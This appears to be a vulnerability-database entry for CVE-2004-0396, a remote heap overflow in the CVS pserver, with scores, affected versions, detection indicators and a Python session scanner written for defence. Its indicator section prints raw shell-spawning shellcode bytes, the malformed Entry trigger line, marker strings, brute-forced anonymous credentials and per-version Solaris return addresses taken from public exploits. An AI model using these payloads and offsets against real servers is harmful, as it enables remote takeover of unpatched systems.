CVE-2004-0396
published 2004-06-14


Priority: P2 · 62 · high
CVSS 2.0: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Exploit: public exploit available
EPSS: 67.53% (99.2th percentile)
Heap-based buffer overflow in CVS 1.11.x up to 1.11.15, and 1.12.x up to 1.12.7, when using the pserver mechanism allows remote attackers to execute arbitrary code via Entry lines.

Affected

7 ranges
Vendor   Product  Version range             Fixed in
cvs      cvs      -                         -
cvs      cvs      -                         -
cvs      cvs      >= 0 < 1:1.12.5-6         1:1.12.5-6
cvs      cvs      >= 0 < 1:1.12.5-6         1:1.12.5-6
cvs      cvs      >= 0 < 1:1.12.5-6         1:1.12.5-6
cvs      cvs      >= 0 < 1:1.12.5-6         1:1.12.5-6
debian   cvs      < 1:1.12.5-6 (bookworm)   1:1.12.5-6 (bookworm)

Detection & IOCs (extracted from sources)

port: 2401
command: Entry /CCCCCCCCC/CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC/CCCCCCCCCCC
other: MAGICSTRING: abroxyou
other: ABMAGIC: -AB-
bytes:
\xeb\x15\x42\x4c\x34\x43\x4b\x48\x34\x37\x20\x34\x20\x4c\x31\x46\x33\x20\x42\x52\x4f\x21\x0a\x31\xc0\x50\x68\x78\x79\x6f\x75\x68\x61\x62\x72\x6f\x89\xe1\x6a\x08\x5a\x31\xdb\x43\x6a\x04\x58\xcd\x80\x6a\x17\x58\x31\xdb\xcd\x80\x31\xd2\x52\x68\x2e\x2e\x72\x67\x58\x05\x01\x01\x01\x01\x50\xeb\x12\x4c\x45\x20\x54\x52\x55\x43\x20\x43\x48\x45\x4c\x4f\x55\x20\x49\x43\x49\x68\x2e\x62\x69\x6e\x58\x40\x50\x89\xe3\x52\x54\x54\x59\x6a\x0b\x58\xcd\x80\x31\xc0\x40\xcd\x80
bytes:
\x6a\x1b\x58\x31\xdb\xcd\x80\x85\xc0\x74\x42\x6a\x19\x58\x50\xcd\x80\x50\x6a\x17\x58\x50\xcd\x80\x68\x2d\x41\x42\x2d\x89\xe3\x6a\x04\x58\x50\x53\x6a\x01\x50\xcd\x80\x6a\x02\x6a\x01\x50\xb0\x5a\xcd\x80\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\x50\x51\x53\x50\xb0\x3b\xcd\x80\x6a\x31\x58\xcd\x80\x93\x6a\x17\x58\xcd\x80\x6a\x04\x58\x6a\x01\x5b\x68\x2d\x41\x42\x2d\x89\xe1\x89\xc2\xcd\x80\xb0\x3f\x6a\x01\x5b\x6a\x02\x59\xcd\x80\x31\xc0\x99\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x00
bytes:
\x21\x18\xd8\x58\xa0\x14\x23\x61\x90\x10\x20\x01\x92\x0b\x80\x0e\x94\x10\x20\x04\x82\x10\x20\x04\x91\xd0\x20\x08\x20\xbf\xff\xff\x20\xbf\xff\xff\x7f\xff\xff\xff\x90\x03\xe0\x20\x92\x02\x20\x10\xc0\x22\x20\x08\xd0\x22\x20\x10\xc0\x22\x20\x14\x82\x10\x20\x0b\x91\xd0\x20\x08/bin/ksh
  • Monitor TCP port 2401 (CVS pserver) for malformed 'Entry' lines sent during authentication — the overflow is triggered via Entry lines in the pserver protocol.
  • Detect exploit traffic by looking for the magic marker string 'abroxyou' in CVS pserver (TCP/2401) traffic, used by the exploit to confirm shellcode execution.
  • Detect exploit traffic by looking for the marker string '-AB-' written to stdout by the xx_shellcode payload, indicating successful exploitation.
  • Detect heap-spray/normalization phase: large numbers of 'Entry' lines with repeated 0x41/0x42/0x43 fill bytes sent over CVS pserver prior to the overflow.
  • Exploit uses 'Gzip-stream 1' compression negotiation immediately before triggering the overflow; detect anomalous Gzip-stream requests on CVS pserver sessions that also contain oversized Entry lines.
  • Exploit brute-forces common anonymous CVS credentials (user: anonymous/anoncvs/cvs/guest; pass: empty/anonymous/anoncvs) and common cvsroot paths; alert on rapid sequential AUTH REQUEST attempts with these credentials.
  • Affected versions are CVS 1.11.x through 1.11.15 and 1.12.x through 1.12.7 only; the vulnerability requires the pserver mechanism to be enabled.
  • The Linux exploit (exploit-db 300) attempts OS fingerprinting before choosing between Linux and BSD exploitation paths; detection rules should cover both code paths.
  • The Solaris/SPARC exploit (exploit-db 301) targets specific CVS binary offsets per version; retaddr values differ per target (e.g., 0xd4cc8 for cvs-1.11.1p1 Solaris9/SPARC, 0xd7ae8+8192 for cvs-1.12.2 Solaris9/SPARC).
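The detection notes above can be turned into a small session scanner. The following is an added example written for this page, not code from the CVE record or from either public exploit: it walks the lines of one CVS pserver (TCP/2401) session, in either direction, and flags oversized `Entry` lines, runs of 0x41/0x42/0x43 fill bytes, `Gzip-stream` negotiation followed by an oversized `Entry`, the `abroxyou` and `-AB-` marker strings, and repeated anonymous `AUTH REQUEST` attempts. The thresholds (`MAX_ENTRY_LEN`, `MIN_FILL_RUN`, `AUTH_ATTEMPT_LIMIT`) and both sample sessions are constructed assumptions for illustration, not values from the sources.

```python
"""Scan captured CVS pserver (TCP/2401) session lines for the
CVE-2004-0396 indicators listed in the detection notes.

Added illustration; the thresholds below are assumptions to tune per
environment, not values taken from the CVE record.
"""
import re
from dataclasses import dataclass

# Assumed thresholds (not from the page).
MAX_ENTRY_LEN = 256        # legitimate Entry lines carry short path/revision fields
MIN_FILL_RUN = 32          # repeated 0x41/0x42/0x43 bytes suggesting heap fill
AUTH_ATTEMPT_LIMIT = 3     # anonymous AUTH REQUESTs in one session before alerting

# Indicators named in the detection notes.
MARKERS = (b"abroxyou", b"-AB-")
ANON_USERS = {b"anonymous", b"anoncvs", b"cvs", b"guest"}
# A run of MIN_FILL_RUN or more identical bytes drawn from A/B/C (0x41/0x42/0x43).
FILL_RUN_RE = re.compile(rb"([ABC])\1{%d,}" % (MIN_FILL_RUN - 1))


@dataclass(frozen=True)
class Finding:
    rule: str
    line_no: int
    detail: str


def scan_session(lines):
    """Return Finding objects for one pserver session.

    `lines` is an iterable of raw protocol lines (bytes, no trailing newline)
    in the order they were seen; the authentication block is
    BEGIN AUTH REQUEST / cvsroot / user / scrambled password / END AUTH REQUEST.
    """
    findings = []
    auth_attempts = 0
    in_auth = False
    auth_fields = []
    saw_gzip = False

    for line_no, line in enumerate(lines, 1):
        if line == b"BEGIN AUTH REQUEST":
            in_auth, auth_fields = True, []
            continue
        if in_auth:
            if line != b"END AUTH REQUEST":
                auth_fields.append(line)
                continue
            in_auth = False
            user = auth_fields[1] if len(auth_fields) >= 2 else b""
            if user in ANON_USERS:
                auth_attempts += 1
                if auth_attempts >= AUTH_ATTEMPT_LIMIT:
                    findings.append(Finding("anon-auth-bruteforce", line_no,
                                            f"{auth_attempts} anonymous AUTH REQUESTs in one session"))
            continue

        if line.startswith(b"Gzip-stream "):
            saw_gzip = True   # compression negotiated; oversized Entry after this is more suspicious

        if line.startswith(b"Entry "):
            if len(line) > MAX_ENTRY_LEN:
                findings.append(Finding("oversized-entry", line_no, f"Entry line of {len(line)} bytes"))
                if saw_gzip:
                    findings.append(Finding("gzip-then-oversized-entry", line_no,
                                            "Gzip-stream negotiated before oversized Entry"))
            run = FILL_RUN_RE.search(line)
            if run:
                findings.append(Finding("fill-run", line_no,
                                        f"{len(run.group(0))} x {run.group(1)!r} in Entry line"))

        for marker in MARKERS:
            if marker in line:
                findings.append(Finding("exploit-marker", line_no, f"marker {marker!r} seen"))

    return findings


# Constructed sample sessions (not captured traffic).
BENIGN_SESSION = [
    b"BEGIN AUTH REQUEST", b"/cvsroot", b"anonymous", b"A", b"END AUTH REQUEST",
    b"Root /cvsroot", b"Valid-responses ok error", b"valid-requests",
    b"Argument README", b"Directory .", b"/cvsroot",
    b"Entry /README/1.3//-kkv/", b"Unchanged README", b"update",
]

SUSPICIOUS_SESSION = [
    b"BEGIN AUTH REQUEST", b"/cvsroot", b"anonymous", b"A", b"END AUTH REQUEST",
    b"BEGIN AUTH REQUEST", b"/cvsroot", b"anoncvs", b"A", b"END AUTH REQUEST",
    b"BEGIN AUTH REQUEST", b"/cvs", b"guest", b"A", b"END AUTH REQUEST",
    b"Root /cvs",
    b"Gzip-stream 1",
    b"Entry /" + b"A" * 64 + b"/",                       # fill phase: short but repetitive
    b"Entry /" + b"C" * 40 + b"/" + b"C" * 300 + b"/",   # oversized Entry after Gzip-stream
    b"abroxyou",                                         # marker echoed back on success
]

if __name__ == "__main__":
    for name, session in (("benign", BENIGN_SESSION), ("suspicious", SUSPICIOUS_SESSION)):
        print(f"== {name} ==")
        for f in scan_session(session):
            print(f"  line {f.line_no}: {f.rule}: {f.detail}")
```

Run against a pcap by reassembling each TCP/2401 stream and splitting on newlines before calling `scan_session`; the benign session produces no findings, while the constructed suspicious session yields the brute-force, fill-run, oversized-entry, gzip-then-oversized-entry and exploit-marker findings in line order.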

CVSS provenance

Source         Version  Score  Severity  Vector
nvd            v2.0     7.5    HIGH      AV:N/AC:L/Au:N/C:P/I:P/A:P
osv            -        7.5    HIGH      -
vendor_debian  -        7.5    HIGH      -
vendor_redhat  -        7.5    HIGH      -